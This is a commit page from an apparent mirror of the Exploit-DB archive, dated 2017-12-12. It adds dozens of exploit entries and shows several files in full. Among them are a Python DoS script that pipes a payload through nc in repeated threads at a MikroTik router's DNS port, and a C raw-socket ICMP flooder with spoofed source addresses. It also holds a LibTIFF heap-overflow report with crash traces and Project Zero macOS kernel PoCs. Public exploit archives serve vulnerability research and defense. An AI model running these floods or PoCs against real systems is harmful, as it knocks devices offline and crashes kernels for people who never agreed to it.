bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-12

Browse source 
35 changes to exploits/shellcodes

MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service
MikroTik 6.40.5 ICMP - Denial of Service
iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules
macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures
macOS - 'getrusage' Stack Leak Through struct Padding
macOS - 'necp_get_socket_attributes' so_pcb Type Confusion
LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow

Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection
Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection
Laundry Booking Script 1.0 - 'list?city' SQL Injection
Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection
Multivendor Penny Auction Clone Script 1.0 - SQL Injection
Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection
Opensource Classified Ads Script 3.2 - SQL Injection
PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection
Professional Service Script 1.0 - 'service-list?city' SQL Injection
Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection
Readymade Video Sharing Script 3.2 - SQL Injection
Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection
Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection
Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection
Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection
Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection
Advanced Real Estate Script 4.0.7 - SQL Injection
Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection
MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection
MLM Forced Matrix 2.0.9 - 'newid' SQL Injection
Car Rental Script 2.0.4 - 'val' SQL Injection
Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection
Muslim Matrimonial Script 3.02 - 'succid' SQL Injection
Advanced World Database 2.0.5 - SQL Injection
Resume Clone Script 2.0.5 - SQL Injection
Basic Job Site Script 2.0.5 - SQL Injection
Vanguard 1.4 - Arbitrary File Upload
Vanguard 1.4 - SQL Injection
This commit is contained in:
Offensive Security 2017-12-12 05:02:17 +00:00
parent e37fd2bae3
commit 9cea53a35b
36 changed files with 2100 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
exploits/hardware/dos/43200.py Executable file
View file

@ -0,0 +1,41 @@
import socket
import os
import time
from threading import Thread
import sys
def rep1():
os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc')
os.system('cat poc | nc -v 192.168.1.1 53')
def rep2():
os.system('cat poc | nc -v 192.168.1.1 53')
def rep3():
os.system('cat poc | nc -v 192.168.1.1 53')
def rep4():
os.system('cat poc | nc -v 192.168.1.1 53')
def rep5():
os.system('cat poc | nc -v 192.168.1.1 53')
if __name__ == "__main__":
threads = []
try:
for a in [rep1, rep2, rep3, rep4, rep5]:
t = Thread(target=a)
t.start()
threads.append(t)
time.sleep(4)
time.sleep(4)
print("For Stopping the attack, Hit CTRL+C now")
except KeyboardInterrupt:
sys.exit(0)
finally:
[t.join() for t in threads]

162
exploits/hardware/dos/43317.c Normal file
View file

@ -0,0 +1,162 @@
#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <string.h>
#include <netinet/ip.h>
#define handle(i) htons(i)
#define cicmp 32
#define aicmp() (a_flags & cicmp)
#define sending_p() if (sendto(rawsock,&packet,(sizeof packet),0,(struct sockaddr *)&victim,sizeof victim) < 0) {\
perror("sendto");\
exit(-1);\
}
struct sockaddr_in victim;
u_long change(const char *host);
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);
u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct {
int a;
int b;
void (*f)(u_char);
} a_list[] = {
{ cicmp, ICMP_ECHO, send_icmp },
{ 0, 0, (void *)NULL },
};
int
main(int argc, char *argv[])
{
int n, i, on = 1;
int b_link;
#ifdef F_PASS
struct stat sb;
#endif
unsigned int until;
a_flags = dstaddr = i = 0;
dst_sp = dst_ep = src_sp = src_ep = 0;
until = b_link = -1;
src_class = dst_class = NULL;
while ( (n = getopt(argc, argv, "Is:h:")) != -1) {
char *p;
switch (n) {
case 'I':
a_flags |= cicmp;
break;
case 'h':
dstaddr = change(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ( (!dstaddr && !i) ||
(dstaddr && i) ||
( !aicmp()) ||
(src_sp != 0 && src_sp > src_ep) ||
(dst_sp != 0 && dst_sp > dst_ep))
usage(argv[0]);
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
for (n = 0; ; ) {
if (b_link != -1 && random() % 100 +1 > b_link) {
if (random() % 200 +1 > 199)
usleep(1);
continue;
}
for (i = 0; a_list[i].f != NULL; ++i) {
if (a_list[i].a & a_flags)
a_list[i].f(a_list[i].b);
}
if (n++ == 100) {
n = 0;
}
}
exit(0);
}
u_long change(const char *host)
{
struct hostent *hp;
if ( (hp = gethostbyname(host)) == NULL) {
perror("gethostbyname");
exit(-1);
}
return *(u_long *)hp->h_addr;
}
#define RANDOM() (int) random() % 255 +1
char *
class2ip(const char *class)
{
static char ip[16];
int i, j;
for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
if (class[i] == '.')
++j;
switch (j) {
case 0:
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
break;
case 1:
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
break;
case 2:
sprintf(ip, "%s.%d", class, RANDOM());
break;
default: strncpy(ip, class, 16);
break;
}
return ip;
}
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_p = p;
ip->ip_tos = 0;
ip->ip_id = random();
ip->ip_len = len;
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_dst.s_addr = dst_class != NULL ?
inet_addr(class2ip(dst_class)) :
dstaddr;
ip->ip_src.s_addr = src_class != NULL ?
inet_addr(class2ip(src_class)) :
random();
victim.sin_addr.s_addr = ip->ip_dst.s_addr;
}
static void
send_icmp(u_char gargabe)
{
struct packet {
struct ip ip;
struct icmp icmp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_ICMP, handle(sizeof packet));
packet.icmp.icmp_type = ICMP_ECHO;
packet.icmp.icmp_code = 0;
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
sending_p();
}
static void
usage(const char *argv0)
{
printf("-I -h IP\n");
exit(-1);
}

391
exploits/linux/dos/43322.txt Normal file
View file

@ -0,0 +1,391 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2750
The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null
The asan debug information is below:
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
=================================================================
==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8
WRITE of size 1 at 0x611000009fe1 thread T0
#0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
#1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5)
0x611000009fe1 is located 0 bytes to the right of 225-byte region
[0x611000009f00,0x611000009fe1)
allocated by thread T0 here:
#0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08)
#1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748)
#2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
SUMMARY: AddressSanitizer: heap-buffer-overflow
(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
Shadow bytes around the buggy address:
0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa
0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29649==ABORTING
pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188.
That cause heap overflow and lead to memory corruption in TIFFSetupStrips().
(gdb) r sample.tiff /dev/null
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff
/dev/null
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory
corruption: 0x0000000000652160 ***
Program received signal SIGABRT, Aborted.
0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff7745028 in __GI_abort () at abort.c:89
#2 0x00007ffff777e2a4 in __libc_message (do_abort=1,
fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n")
at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160,
str=0x7ffff788c4df "malloc(): memory corruption", action=<optimized out>)
at malloc.c:4998
#4 _int_malloc (av=0x7ffff7acd760 <main_arena>, bytes=24) at malloc.c:3449
#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893
#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at
tif_write.c:545
#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=<optimized out>,
module=0x42de50 <module> "TIFFWriteScanline") at tif_write.c:613
#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80,
buf=buf@entry=0x652070,
row=row@entry=0, sample=sample@entry=0) at tif_write.c:56
#9 0x0000000000401dbd in main (argc=<optimized out>, argv=<optimized out>) at
pal2rgb.c:200
Affected version: 4.0.9
Latest version: 4.0.9
pal2rgb allocate output buffer to convert TIFF format. The output buffer always
uses a fixed size(225). However, when write data to output buffer, imagewidth
and imagelength of the input TIFF file are used. it lead to heap overflow.
1) get imagewidth and imagelength from input TIFF
tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth);
tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength);
2) allocate output buffer
tools/pal2rgb.c:188 obuf = (unsigned
char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns
always 225.
3) write data to output buffer
tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) {
tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0))
tools/pal2rgb.c:193 goto done;
tools/pal2rgb.c:194 pp = obuf;
tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP
OVERFLOW!
tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]];
tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]];
tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]];
tools/pal2rgb.c:199 }
tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) //
CRASH!
tools/pal2rgb.c:201 goto done;
tools/pal2rgb.c:202 }
The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of
the TIFF document. The offset of the corresponding values in the poc.tiff file
is shown below.
COLORMAP {
R : 0x25~0x224
G : 0x225~0x424
B : 0x425~0x624
}
Image Width : 0x24FE
Image Length : 0x250A
Note
You need to log in before you can comment on or make changes to this bug.
Description From jungun.baek 2017-11-29 00:50:42
The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null
The asan debug information is below:
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
=================================================================
==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8
WRITE of size 1 at 0x611000009fe1 thread T0
#0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
#1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5)
0x611000009fe1 is located 0 bytes to the right of 225-byte region
[0x611000009f00,0x611000009fe1)
allocated by thread T0 here:
#0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08)
#1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748)
#2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
SUMMARY: AddressSanitizer: heap-buffer-overflow
(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
Shadow bytes around the buggy address:
0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa
0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29649==ABORTING
pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188.
That cause heap overflow and lead to memory corruption in TIFFSetupStrips().
(gdb) r sample.tiff /dev/null
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff
/dev/null
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory
corruption: 0x0000000000652160 ***
Program received signal SIGABRT, Aborted.
0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff7745028 in __GI_abort () at abort.c:89
#2 0x00007ffff777e2a4 in __libc_message (do_abort=1,
fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n")
at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160,
str=0x7ffff788c4df "malloc(): memory corruption", action=<optimized out>)
at malloc.c:4998
#4 _int_malloc (av=0x7ffff7acd760 <main_arena>, bytes=24) at malloc.c:3449
#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893
#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at
tif_write.c:545
#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=<optimized out>,
module=0x42de50 <module> "TIFFWriteScanline") at tif_write.c:613
#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80,
buf=buf@entry=0x652070,
row=row@entry=0, sample=sample@entry=0) at tif_write.c:56
#9 0x0000000000401dbd in main (argc=<optimized out>, argv=<optimized out>) at
pal2rgb.c:200
Affected version: 4.0.9
Latest version: 4.0.9
------- Comment #1 From jungun.baek 2017-11-29 01:44:26 -------
pal2rgb allocate output buffer to convert TIFF format. The output buffer always
uses a fixed size(225). However, when write data to output buffer, imagewidth
and imagelength of the input TIFF file are used. it lead to heap overflow.
1) get imagewidth and imagelength from input TIFF
tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth);
tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength);
2) allocate output buffer
tools/pal2rgb.c:188 obuf = (unsigned
char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns
always 225.
3) write data to output buffer
tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) {
tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0))
tools/pal2rgb.c:193 goto done;
tools/pal2rgb.c:194 pp = obuf;
tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP
OVERFLOW!
tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]];
tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]];
tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]];
tools/pal2rgb.c:199 }
tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) //
CRASH!
tools/pal2rgb.c:201 goto done;
tools/pal2rgb.c:202 }
------- Comment #2 From jungun.baek 2017-11-29 02:28:44 -------
Created an attachment (id=819) [details]
heap overflow PoC
------- Comment #3 From jungun.baek 2017-11-29 06:33:21 -------
The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of
the TIFF document. The offset of the corresponding values in the poc.tiff file
is shown below.
COLORMAP {
R : 0x25~0x224
G : 0x225~0x424
B : 0x425~0x624
}
Image Width : 0x24FE
Image Length : 0x250A
------- Comment #4 From ncopa@alpinelinux.org 2017-12-07 04:42:35 -------
The following change fixes the describe behavior:
diff --git a/tools/pal2rgb.c b/tools/pal2rgb.c
index 7a57800..92d9e29 100644
--- a/tools/pal2rgb.c
+++ b/tools/pal2rgb.c
@@ -184,15 +184,17 @@ main(int argc, char* argv[])
{ unsigned char *ibuf, *obuf;
register unsigned char* pp;
register uint32 x;
- ibuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(in));
- obuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(out));
+ size_t ibuf_size = TIFFScanlineSize(in);
+ size_t obuf_size = TIFFScanlineSize(out);
+ ibuf = (unsigned char*)_TIFFmalloc(ibuf_size);
+ obuf = (unsigned char*)_TIFFmalloc(obuf_size);
switch (config) {
case PLANARCONFIG_CONTIG:
for (row = 0; row < imagelength; row++) {
if (!TIFFReadScanline(in, ibuf, row, 0))
goto done;
pp = obuf;
- for (x = 0; x < imagewidth; x++) {
+ for (x = 0; x < imagewidth && x < (obuf_size-3); x++) {
*pp++ = (unsigned char) rmap[ibuf[x]];
*pp++ = (unsigned char) gmap[ibuf[x]];
*pp++ = (unsigned char) bmap[ibuf[x]];
@@ -205,15 +207,15 @@ main(int argc, char* argv[])
for (row = 0; row < imagelength; row++) {
if (!TIFFReadScanline(in, ibuf, row, 0))
goto done;
- for (pp = obuf, x = 0; x < imagewidth; x++)
+ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
*pp++ = (unsigned char) rmap[ibuf[x]];
if (!TIFFWriteScanline(out, obuf, row, 0))
goto done;
- for (pp = obuf, x = 0; x < imagewidth; x++)
+ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
*pp++ = (unsigned char) gmap[ibuf[x]];
if (!TIFFWriteScanline(out, obuf, row, 0))
goto done;
- for (pp = obuf, x = 0; x < imagewidth; x++)
+ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
*pp++ = (unsigned char) bmap[ibuf[x]];
if (!TIFFWriteScanline(out, obuf, row, 0))
goto done;
But the pal2rgb stil segfaults. new backtrace:
Core was generated by `pal2rgb /home/ncopa/Downloads/poc.tiff out.tiff'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
(gdb) bt
#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
#1 0x000065eb6f9c26b7 in TIFFjpeg_abort (sp=sp@entry=0xdbd8738e7c0)
at tif_jpeg.c:416
#2 0x000065eb6f9c3f8c in JPEGPreDecode (tif=0x65eb6fc06900, s=<optimized out>)
at tif_jpeg.c:1114
#3 0x000065eb6f9d4305 in TIFFSeek (sample=0, row=54, tif=0x65eb6fc06900)
at tif_read.c:379
#4 TIFFReadScanline (tif=0x65eb6fc06900, buf=0xdbd8738ef40, row=54,
sample=<optimized out>) at tif_read.c:446
#5 0x00000dbd8718c5fc in main (argc=<optimized out>, argv=<optimized out>)
at pal2rgb.c:194
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43322.zip

69
exploits/macos/dos/43318.c Normal file
View file

@ -0,0 +1,69 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2
When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):
errno_t
necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
{
int error = 0;
u_int8_t *buffer = NULL;
u_int8_t *cursor = NULL;
size_t valsize = 0;
struct inpcb *inp = sotoinpcb(so);
if (inp->inp_necp_attributes.inp_domain != NULL) {
valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
}
[...]
}
sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):
#define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)
If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).
To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).
==============
*/
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>
#define SO_NECP_ATTRIBUTES 0x1109
int main(void) {
while (1) {
int s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1)
err(1, "socket");
getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
close(s);
}
}
/*
==============
On macOS 10.13 (17A405), this causes the following crash:
==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
R8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============
This bug should be usable for disclosing kernel memory.
*/

201
exploits/macos/dos/43319.c Normal file
View file

@ -0,0 +1,201 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405
For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:
int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
struct rusage *rup, rubuf;
struct user64_rusage rubuf64;
struct user32_rusage rubuf32;
size_t retsize = sizeof(rubuf); // default: 32 bits
caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits
struct timeval utime;
struct timeval stime;
switch (uap->who) {
case RUSAGE_SELF:
calcru(p, &utime, &stime, NULL);
proc_lock(p);
rup = &p->p_stats->p_ru;
rup->ru_utime = utime;
rup->ru_stime = stime;
rubuf = *rup;
proc_unlock(p);
break;
[...]
}
if (IS_64BIT_PROCESS(p)) {
retsize = sizeof(rubuf64);
retbuf = (caddr_t)&rubuf64;
munge_user64_rusage(&rubuf, &rubuf64);
} else {
[...]
}
return (copyout(retbuf, uap->rusage, retsize));
}
`munge_user64_rusage()` performs the conversion by copying individual fields:
__private_extern__ void
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
// timeval changes size, so utime and stime need special handling
a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}
`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:
#define _STRUCT_USER64_TIMEVAL struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
user64_time_t tv_sec; // seconds
__int32_t tv_usec; // and microseconds
};
struct user64_rusage {
struct user64_timeval ru_utime; // user time used
struct user64_timeval ru_stime; // system time used
user64_long_t ru_maxrss; // max resident set size
[...]
};
This padding is not initialized, but is copied to userspace.
